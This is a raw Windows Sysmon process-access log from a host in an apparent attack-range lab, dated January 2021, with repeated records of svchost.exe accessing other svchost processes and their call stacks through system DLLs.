13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011065Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011064Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011063Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011062Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011061Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011060Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8b22|c:\windows\system32\lsm.dll+8a76|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011059Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8a38|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011058Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011057Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011056Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011055Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011054Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011053Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.742{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011052Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011051Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011050Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011049Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011048Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011047Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011046Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:58:22.696{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FE04-00000000A301}5108C:\Windows\system32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eacf|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011045Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.696{59A5CD1D-93FB-6005-FE04-00000000A301}5108820C:\Windows\system32\svchost.exe{59A5CD1D-93FB-6005-FD04-00000000A301}1156C:\Windows\System32\svchost.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\appxdeploymentserver.dll+6468b|c:\windows\system32\appxdeploymentserver.dll+2d35e|c:\windows\system32\appxdeploymentserver.dll+2d19d|c:\windows\system32\appxdeploymentserver.dll+114d56|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x800000000000000011044Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000011043Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:58:22.680{59A5CD1D-8E46-6005-0C00-00000000A301}5961244C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2A00-00000000A301}2864C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
